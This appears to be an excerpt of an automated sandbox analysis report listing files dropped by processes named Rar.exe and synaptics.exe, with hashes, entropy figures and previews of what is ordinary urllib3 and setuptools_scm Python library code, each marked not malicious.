                                                                                                                                                                                      Preview:# file generated by setuptools_scm.# don't change, don't track in version control.TYPE_CHECKING = False.if TYPE_CHECKING:. from typing import Tuple, Union. VERSION_TUPLE = Tuple[Union[int, str], ...].else:. VERSION_TUPLE = object..version: str.__version__: str.__version_tuple__: VERSION_TUPLE.version_tuple: VERSION_TUPLE..__version__ = version = '2.2.3'.__version_tuple__ = version_tuple = (2, 2, 3).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with very long lines (301)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):39508
                                                                                                                                                                                      Entropy (8bit):4.473272978235349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:j20pONctjcEuFsxXWNudS5ExQzGDY5MR2WOyBTbpU4QtWxjLcAL2v6T8CEbUu69o:ji+tAEuBNudwExQyDM1DNtOLhqyxu6Gt
                                                                                                                                                                                      MD5:A41ED36F212B28587E42422FFB9E4B42
                                                                                                                                                                                      SHA1:C72D8E815D23D7D4B1213CCA6CF55793E901461D
                                                                                                                                                                                      SHA-256:400C21395E4639576C16732F5F956FE9F43C7F8EC4CDFAD138002B7F145D40E6
                                                                                                                                                                                      SHA-512:70EE018BC8019DA1E6C68395FD6BAEB652830785C0A32A5CF3269C3B7E4939A7DA683078C578022B1FD408240F51B2A818D62FF31718A5423EC884B5F972B2FB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import datetime.import http.client.import logging.import os.import re.import socket.import sys.import threading.import typing.import warnings.from http.client import HTTPConnection as _HTTPConnection.from http.client import HTTPException as HTTPException # noqa: F401.from http.client import ResponseNotReady.from socket import timeout as SocketTimeout..if typing.TYPE_CHECKING:. from .response import HTTPResponse. from .util.ssl_ import _TYPE_PEER_CERT_RET_DICT. from .util.ssltransport import SSLTransport..from ._collections import HTTPHeaderDict.from .http2 import probe as http2_probe.from .util.response import assert_header_parsing.from .util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT, Timeout.from .util.util import to_str.from .util.wait import wait_for_read..try: # Compiled with SSL?. import ssl.. BaseSSLError = ssl.SSLError.except (ImportError, AttributeError):. ssl = None # type: ignore[assignment].. class BaseSSLError
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):43393
                                                                                                                                                                                      Entropy (8bit):4.361070165720964
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:PyTlQ2f1QbQkhKL2+zgzi/4oS2x09V5F4WtytamYw:P2Q2fyBbzi/5QkamYw
                                                                                                                                                                                      MD5:4F65EC10CA80B40728733931A65B9C06
                                                                                                                                                                                      SHA1:8377AB930A8032897D65672A09FB811E216FE909
                                                                                                                                                                                      SHA-256:E5F3C81F2A4FC256CA04048CB3A6C44931095441A5B23F45398F7F1865361A93
                                                                                                                                                                                      SHA-512:EACD01583F4AB0C35D85AADF902FD1C1E60CD50FEA55EC293467D13E2EF47B249BECB24EBD0718E5E9F508BD1C30B91151C5E382058DE04C2E19970B17BD8602
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import errno.import logging.import queue.import sys.import typing.import warnings.import weakref.from socket import timeout as SocketTimeout.from types import TracebackType..from ._base_connection import _TYPE_BODY.from ._collections import HTTPHeaderDict.from ._request_methods import RequestMethods.from .connection import (. BaseSSLError,. BrokenPipeError,. DummyConnection,. HTTPConnection,. HTTPException,. HTTPSConnection,. ProxyConfig,. _wrap_proxy_error,.).from .connection import port_by_scheme as port_by_scheme.from .exceptions import (. ClosedPoolError,. EmptyPoolError,. FullPoolError,. HostChangedError,. InsecureRequestWarning,. LocationValueError,. MaxRetryError,. NewConnectionError,. ProtocolError,. ProxyError,. ReadTimeoutError,. SSLError,. TimeoutError,.).from .response import BaseHTTPResponse.from .util.connection import is_connection_dropped.from .util.proxy import connection
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):167
                                                                                                                                                                                      Entropy (8bit):4.589436179731363
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/C8llGllluleh/wZWevouWAuaHF50YTlHX0M9VWrzOXH+IOkcTgp:y/C8lcl/qeh/wjo+uaHxEM9Ar6XeR4
                                                                                                                                                                                      MD5:90F1B09BA05E86AEBE9D63BC0AFAB6FB
                                                                                                                                                                                      SHA1:94C96FF5AC94893757E25944E7BB9BA9389827E9
                                                                                                                                                                                      SHA-256:FE1F38A3B984211662EA49979A2AC2E5AD23E4C0D7CD18EE282CE1DEE087D70D
                                                                                                                                                                                      SHA-512:7BAA211F4051C912CCAD0C9658D03739308EE9D5E62F8A06DCC6BFFC346168D0F5A597E0BD9E545FA6A736AF51E0A844F00DF13D489B02F52887F67A48E87320
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.S.).N..r....r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6128
                                                                                                                                                                                      Entropy (8bit):5.6368976617629984
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:7q8bFojUEqiHSz8XKWZMs7hTbWiTmC69iE245Zi81JQ3:W6VEqt3GbC9ipca3
                                                                                                                                                                                      MD5:4646FAC81063E984B3293DC09325C233
                                                                                                                                                                                      SHA1:2789125CE874D5A1B985641F3E3B7706AE70928D
                                                                                                                                                                                      SHA-256:8FE7CB3D7C99E0B1AB573633646AEF632C5FA603A1F5A7DBB4496D6909AA7F2A
                                                                                                                                                                                      SHA-512:53C10552C15C3BBB33235016E1CD5DBE10E43B710754F99C693112685E4B7811F793CCF094A0680B98090635853BAD5B2E98EB84FB5890547CC65AC95723D78C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):733
                                                                                                                                                                                      Entropy (8bit):4.527161799307811
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1RjscOstNQm7icj7iMNfAKgX4vkvW2CXAo07icBNro07iMN0T7icPuT7iMNv:1Rp1tvAfNuzn4WnJq
                                                                                                                                                                                      MD5:C6960672D5A330E53A2557CFCC64D430
                                                                                                                                                                                      SHA1:CE27902CAFC40DBD0013400D817460E4F6BFAEF2
                                                                                                                                                                                      SHA-256:BBA28D8338E51596EE0005DAFF26C247B810EF55491129C5F8821D0C0EF76EBC
                                                                                                                                                                                      SHA-512:83C411239F0C147A44FDD7A251A07EF3BDA7D922C7CA9EA61C76A9DDD58DABFDDFD20A968C799FD3CE142CBEF335484A9A45F574A329E80A7BD7D3C3F9AA9B36
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import urllib3.connection..from ...connectionpool import HTTPConnectionPool, HTTPSConnectionPool.from .connection import EmscriptenHTTPConnection, EmscriptenHTTPSConnection...def inject_into_urllib3() -> None:. # override connection classes to use emscripten specific classes. # n.b. mypy complains about the overriding of classes below. # if it isn't ignored. HTTPConnectionPool.ConnectionCls = EmscriptenHTTPConnection. HTTPSConnectionPool.ConnectionCls = EmscriptenHTTPSConnection. urllib3.connection.HTTPConnection = EmscriptenHTTPConnection # type: ignore[misc,assignment]. urllib3.connection.HTTPSConnection = EmscriptenHTTPSConnection # type: ignore[misc,assignment].
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8755
                                                                                                                                                                                      Entropy (8bit):4.497525459881081
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:8Ebt+waKt1H9ytP3r7NSWVfbf8hjOnVrif9OwvMfDtF:Pblto/rj7WMZF
                                                                                                                                                                                      MD5:B2484A578058171D7E25A65AD1522D0E
                                                                                                                                                                                      SHA1:5B6FD60E13C2B2F5E362BEC69F648DADF89D5675
                                                                                                                                                                                      SHA-256:91A05EDAD5ADED8CBDBCD50544157B092C839DF8426082C6C63BBD293663F12C
                                                                                                                                                                                      SHA-512:ADA160189EBA57085B0D0E93FDC17361C0B62E4206C562832C16466D0CB4FCD80F25D464736DA5E7B036DBDA97F82F9B6278BAC2F094DDB34EEC182B994FDC94
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import os.import typing..# use http.client.HTTPException for consistency with non-emscripten.from http.client import HTTPException as HTTPException # noqa: F401.from http.client import ResponseNotReady..from ..._base_connection import _TYPE_BODY.from ...connection import HTTPConnection, ProxyConfig, port_by_scheme.from ...exceptions import TimeoutError.from ...response import BaseHTTPResponse.from ...util.connection import _TYPE_SOCKET_OPTIONS.from ...util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT.from ...util.url import Url.from .fetch import _RequestError, _TimeoutError, send_request, send_streaming_request.from .request import EmscriptenRequest.from .response import EmscriptenHttpResponseWrapper, EmscriptenResponse..if typing.TYPE_CHECKING:. from ..._base_connection import BaseHTTPConnection, BaseHTTPSConnection...class EmscriptenHTTPConnection:. default_port: typing.ClassVar[int] = port_by_scheme["http"]. default_socket_options: ty
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3655
                                                                                                                                                                                      Entropy (8bit):4.6612783191186296
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:+oqyr3+5Jm/HwlC8qDxRLF2ASKVwb5o+RNzJj8NlVYMMbL/Qq9SRNRJOw40pBRXv:+op+5JmPWCjbF2R5PH4lHMbL/QLOz0p/
                                                                                                                                                                                      MD5:CD5FB56C8115E0DB8EB92FF3FBE9960A
                                                                                                                                                                                      SHA1:3D1704D964E37D527D888A606FFC62894520DBFF
                                                                                                                                                                                      SHA-256:0837D817FF420E86EDC7694689DC89D738C312FC0D4F917E75C8665565C38741
                                                                                                                                                                                      SHA-512:A414EA8983DA012F9EB8246A36C016D9ACA2FAD2B74F577297B4D02D37D6E5366DADF9993AB92915C3B3A1116D57423B1CF49076F586B3E51F053D9483F87179
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:let Status = {. SUCCESS_HEADER: -1,. SUCCESS_EOF: -2,. ERROR_TIMEOUT: -3,. ERROR_EXCEPTION: -4,.};..let connections = {};.let nextConnectionID = 1;.const encoder = new TextEncoder();..self.addEventListener("message", async function (event) {. if (event.data.close) {. let connectionID = event.data.close;. delete connections[connectionID];. return;. } else if (event.data.getMore) {. let connectionID = event.data.getMore;. let { curOffset, value, reader, intBuffer, byteBuffer } =. connections[connectionID];. // if we still have some in buffer, then just send it back straight away. if (!value || curOffset >= value.length) {. // read another buffer if required. try {. let readResponse = await reader.read();.. if (readResponse.done) {. // read everything - clear connection and return. delete connections[connectionID];. Atomics.store(intBuffer, 0, Status.SUCCESS_EOF);. Atomics.notify(intBuffer, 0);.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14131
                                                                                                                                                                                      Entropy (8bit):4.581820013726768
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:fao+GnxIT+rEm4IVNSCxmhFFsOeA+Df1AlkhIc3SoO:fF+oZMImCOEfDhIuS3
                                                                                                                                                                                      MD5:1259D5B9753B0A80D00F91D57731D60E
                                                                                                                                                                                      SHA1:92664A84EBE36BF4E845BA734D76B70506E66A25
                                                                                                                                                                                      SHA-256:CA6C09947041BB0E964E92A03C7A5D9A6ACD07196CAFBE47AA80F8467DBB6179
                                                                                                                                                                                      SHA-512:32A7179723C4D90AEC36FBECBC56A607890FF42C864E965529A5FF136BC9E325CF42B62E9FD9EB9CB82FC8875B07B179C12CC950777E93C6F8AA36A52AB776FB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Support for streaming http requests in emscripten...A few caveats -..Firstly, you can't do streaming http in the main UI thread, because atomics.wait isn't allowed..Streaming only works if you're running pyodide in a web worker...Secondly, this uses an extra web worker and SharedArrayBuffer to do the asynchronous fetch.operation, so it requires that you have crossOriginIsolation enabled, by serving over https.(or from localhost) with the two headers below set:.. Cross-Origin-Opener-Policy: same-origin. Cross-Origin-Embedder-Policy: require-corp..You can tell if cross origin isolation is successfully enabled by looking at the global crossOriginIsolated variable in.javascript console. If it isn't, streaming requests will fallback to XMLHttpRequest, i.e. getting the whole.request into a buffer and then returning it. it shows a warning in the javascript console in this case...Finally, the webworker which does the streaming fetch is created on initial import, but will only be star
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):566
                                                                                                                                                                                      Entropy (8bit):4.6695794858845625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1Rjd6xkB2laJtp7Hz+6ZfM+9B2Nx4ehQCn7e7q9NNMdke:1RXBP+6ZfM+9QQw5xMqe
                                                                                                                                                                                      MD5:56AAE3C754DE48411A8E711AE387D95F
                                                                                                                                                                                      SHA1:59F1A59F8AC5104E0552CBD253311E47B5A5FB9E
                                                                                                                                                                                      SHA-256:98BDBCB33CB52AF137349856A2BE633666ABA7C830A650D4FBB8301996398344
                                                                                                                                                                                      SHA-512:5C65B5F475B5899609B7F99610C1672A0B8538481AD74436DE4078DC1E94D7E39CFDBE045C15C16C1B21B3959E89245C58D3A6DE52BDDA7961EE315EB6D5BA83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..from dataclasses import dataclass, field..from ..._base_connection import _TYPE_BODY...@dataclass.class EmscriptenRequest:. method: str. url: str. params: dict[str, str] | None = None. body: _TYPE_BODY | None = None. headers: dict[str, str] = field(default_factory=dict). timeout: float = 0. decode_content: bool = True.. def set_header(self, name: str, value: str) -> None:. self.headers[name.capitalize()] = value.. def set_body(self, body: _TYPE_BODY | None) -> None:. self.body = body.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10017
                                                                                                                                                                                      Entropy (8bit):4.2204512478917655
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:6cnNlu+w09uF0qLthGyvUEaIg+N0axUlZ0ylZBA24bKldWQxcyf1TF4BK:6cnCuqLts6BNl1KGQGq1TFz
                                                                                                                                                                                      MD5:282AFBF6D4A8D0F9B050E8FAD830F1E3
                                                                                                                                                                                      SHA1:C6DE44BD91204180EA3EE31A1EFF677DC361D317
                                                                                                                                                                                      SHA-256:C046163C708BF89B200ADA42A5F9D6198035F837230C6A451AA5825D92F06C76
                                                                                                                                                                                      SHA-512:EB1EBC466D77476A6406658083EB6597B6B1545B761BFAF22F1AB9171DFC21D88188BFBAA6CFAC7457CBEAE18475DC207AA71F45044480D491A54242AC192B73
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import json as _json.import logging.import typing.from contextlib import contextmanager.from dataclasses import dataclass.from http.client import HTTPException as HTTPException.from io import BytesIO, IOBase..from ...exceptions import InvalidHeader, TimeoutError.from ...response import BaseHTTPResponse.from ...util.retry import Retry.from .request import EmscriptenRequest..if typing.TYPE_CHECKING:. from ..._base_connection import BaseHTTPConnection, BaseHTTPSConnection..log = logging.getLogger(__name__)...@dataclass.class EmscriptenResponse:. status_code: int. headers: dict[str, str]. body: IOBase | bytes. request: EmscriptenRequest...class EmscriptenHttpResponseWrapper(BaseHTTPResponse):. def __init__(. self,. internal_response: EmscriptenResponse,. url: str | None = None,. connection: BaseHTTPConnection | BaseHTTPSConnection | None = None,. ):. self._pool = None # set by pool class. se
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):19338
                                                                                                                                                                                      Entropy (8bit):4.845719429755584
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WwnnmU84aF2O8YwCv0KZ78tuqhGWDUGI0iwZzaawE0wD4g0DHfYrf3Jz3OIY/JBc:W0nLQBwCvPhGzhGUiwdfD7FYuI6
                                                                                                                                                                                      MD5:B52F8166A10EAAFAB07641E10C29FB8F
                                                                                                                                                                                      SHA1:1ABC4989FCB7FD5AB9AF0E2E1FD299080BB3A66A
                                                                                                                                                                                      SHA-256:F623F88FC25A7C0E21AAD5FD02027DCF1AEA23E89CA211ABA85A8032BCA835D0
                                                                                                                                                                                      SHA-512:BDE2D42D817DCADA3711CE63747F921C7F15DE04609B8554366EB8AE9B9C339A27233884F5B779EC7AD5005443D9FDB0063F5386AAE3EA5AAA1F72431EB2915D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Module for using pyOpenSSL as a TLS backend. This module was relevant before.the standard library ``ssl`` module supported SNI, but now that we've dropped.support for Python 2.7 all relevant Python versions support SNI so.**this module is no longer recommended**...This needs the following packages installed:..* `pyOpenSSL`_ (tested with 16.0.0).* `cryptography`_ (minimum 1.3.4, from pyopenssl).* `idna`_ (minimum 2.0)..However, pyOpenSSL depends on cryptography, so while we use all three directly here we.end up having relatively few packages required...You can install them with the following command:.... code-block:: bash.. $ python -m pip install pyopenssl cryptography idna..To activate certificate checking, call.:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code.before you begin making HTTP requests. This can be done in a ``sitecustomize``.module, or at any other time before your application begins using ``urllib3``,.like this:.... code-block:: python.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7549
                                                                                                                                                                                      Entropy (8bit):4.639834169659284
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:AojUEqLPKpdAZN7KOSwZf0wvMrpV611hMEZVgJ9:AVEqmrw7KOJZf0wvQpk11KE7M9
                                                                                                                                                                                      MD5:0CF6C586F832D200056BD86CE4B470E5
                                                                                                                                                                                      SHA1:8F6EBE4990D32760297208D75D5B4978892DB4E5
                                                                                                                                                                                      SHA-256:FA26AB75CEB51B2A6C2730FA5BACAE452ECA542C9FA30710AE5FFBD7D1FB9483
                                                                                                                                                                                      SHA-512:89C8AA742C2CD6B0647DA45B4B2708715C8B32877987CC43F62B33B7D0EEBF7E4476D321ABF758DD6D8B6362E447BCEB9A89DE862722AF56D8A0F13107C01FF3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in. your ``proxy_url`` to ensure that DNS resolution is done from the remote. server instead of client-side when connecting to a domain name...SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5.supports IPv4, IPv6, and domain names...When connecting to a SOCKS4 proxy the ``usern
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9393
                                                                                                                                                                                      Entropy (8bit):4.792397513804208
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:/yFB1ICxHTkuUw7qRlqHN4cVSPC5fjY/axAIH9s3w6pov+1xBXVm65BPHQcc19U6:/CTXrWZcmC9XH9spoCFm65BPHQcrO95
                                                                                                                                                                                      MD5:4F61F9FFB40020611E33E90E9F64752E
                                                                                                                                                                                      SHA1:6866D84C5CBF24BE572B91D694A83EA69F14551B
                                                                                                                                                                                      SHA-256:4436A2B9DB51EEBA9B54A4CAA4B4A064106DC1A22A57B799B5EAEF655FE665A8
                                                                                                                                                                                      SHA-512:C0E625642E608878831E3D104A011C7EA1913A0B78D6BA9A9BC0CC92B94D34C7185A71F0D5B134958A0A78BD14ED7FC2ABE14DFEB3057CA2AB1936226562CF44
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import socket.import typing.import warnings.from email.errors import MessageDefect.from http.client import IncompleteRead as httplib_IncompleteRead..if typing.TYPE_CHECKING:. from .connection import HTTPConnection. from .connectionpool import ConnectionPool. from .response import HTTPResponse. from .util.retry import Retry..# Base Exceptions...class HTTPError(Exception):. """Base exception used by this module."""...class HTTPWarning(Warning):. """Base warning used by this module."""..._TYPE_REDUCE_RESULT = typing.Tuple[. typing.Callable[..., object], typing.Tuple[object, ...].]...class PoolError(HTTPError):. """Base exception for errors caused within a pool.""".. def __init__(self, pool: ConnectionPool, message: str) -> None:. self.pool = pool. super().__init__(f"{pool}: {message}").. def __reduce__(self) -> _TYPE_REDUCE_RESULT:. # For pickling purposes.. return self.__class__, (None, None)...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10843
                                                                                                                                                                                      Entropy (8bit):4.6192856607563595
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WSerkc/Ank8CQqdfkl92KcOpIshgcRG/A47FAK/:WSerkSATIDOpIsh747FAK/
                                                                                                                                                                                      MD5:2BD54B482695939797D7AFE1FF47707A
                                                                                                                                                                                      SHA1:8778216DE2496C87F13E4B426B43B932C7B9CBC1
                                                                                                                                                                                      SHA-256:F2F8B43DE468FE91397213E6240D3B2D9B4C91596CE14AC14B5936C4CE74EA33
                                                                                                                                                                                      SHA-512:A5DAFC869C39C369AE2EBE88931DEABBD68F2A4CEC8BC09C99753AF75A713CA1B96E8989B3AD38E754EB548C1D6829A6F0AFC50368AC7C91A6AE430E5DEE7EFE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import email.utils.import mimetypes.import typing.._TYPE_FIELD_VALUE = typing.Union[str, bytes]._TYPE_FIELD_VALUE_TUPLE = typing.Union[. _TYPE_FIELD_VALUE,. typing.Tuple[str, _TYPE_FIELD_VALUE],. typing.Tuple[str, _TYPE_FIELD_VALUE, str],.]...def guess_content_type(. filename: str | None, default: str = "application/octet-stream".) -> str:. """. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. """. if filename:. return mimetypes.guess_type(filename)[0] or default. return default...def format_header_param_rfc2231(name: str, value: _TYPE_FIELD_VALUE) -> str:. """. Helper function to format and quote a single header parameter using the. strategy defined in RFC 2231... Particularly useful for header parameters which might contain. non-A
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2395
                                                                                                                                                                                      Entropy (8bit):4.946770037622349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:PV0Gy/fOGJ7Ae16YNKAqj2GSgg5/zjggoW:TyHOGNAeE2DmgoW
                                                                                                                                                                                      MD5:ED5B7522289EBB739A3E3800CCF533C0
                                                                                                                                                                                      SHA1:E80BE57EC82444ECD1E52FB96A132998AFAFC79A
                                                                                                                                                                                      SHA-256:FBDA894F5D5C3468CEF5DAA7236D3EA04AD9B93BCD68CD7CC5964F0A36526CE1
                                                                                                                                                                                      SHA-512:34886FD378BE78B2301C5FC325DECAE9E8A269DF49DBE127604A41379F8BF01E0ED17AB2E47EDCDFCC5E4DE287D2C94B20D6051AA599B1A6BA7B5D60783DE1D0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import binascii.import codecs.import os.import typing.from io import BytesIO..from .fields import _TYPE_FIELD_VALUE_TUPLE, RequestField..writer = codecs.lookup("utf-8")[3].._TYPE_FIELDS_SEQUENCE = typing.Sequence[. typing.Union[typing.Tuple[str, _TYPE_FIELD_VALUE_TUPLE], RequestField].]._TYPE_FIELDS = typing.Union[. _TYPE_FIELDS_SEQUENCE,. typing.Mapping[str, _TYPE_FIELD_VALUE_TUPLE],.]...def choose_boundary() -> str:. """. Our embarrassingly-simple replacement for mimetools.choose_boundary.. """. return binascii.hexlify(os.urandom(16)).decode()...def iter_field_objects(fields: _TYPE_FIELDS) -> typing.Iterable[RequestField]:. """. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... """. iterable: typing.Iterable[RequestField | tuple[str, _TYPE_FIELD_VALUE_TUPLE]].. if isinstance(fields, typing.Mapping):. iterable = fields.items(). e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1741
                                                                                                                                                                                      Entropy (8bit):4.847457208242871
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:P66qahy6p9S8DV+NMSRKv+0VJN0/ErA9sCZVsCn:yKlphR+NMS0m0VJN0/EMDVp
                                                                                                                                                                                      MD5:73C659DE6243D65676BA07027886B65E
                                                                                                                                                                                      SHA1:3E0DE2068E4B0CDFF235A49D6ACDA3DB24D4AEC2
                                                                                                                                                                                      SHA-256:C73AC0487ED1E4035190F24EA2DE651A70133AADCA2AEC97CC8E36ADC9F09AAB
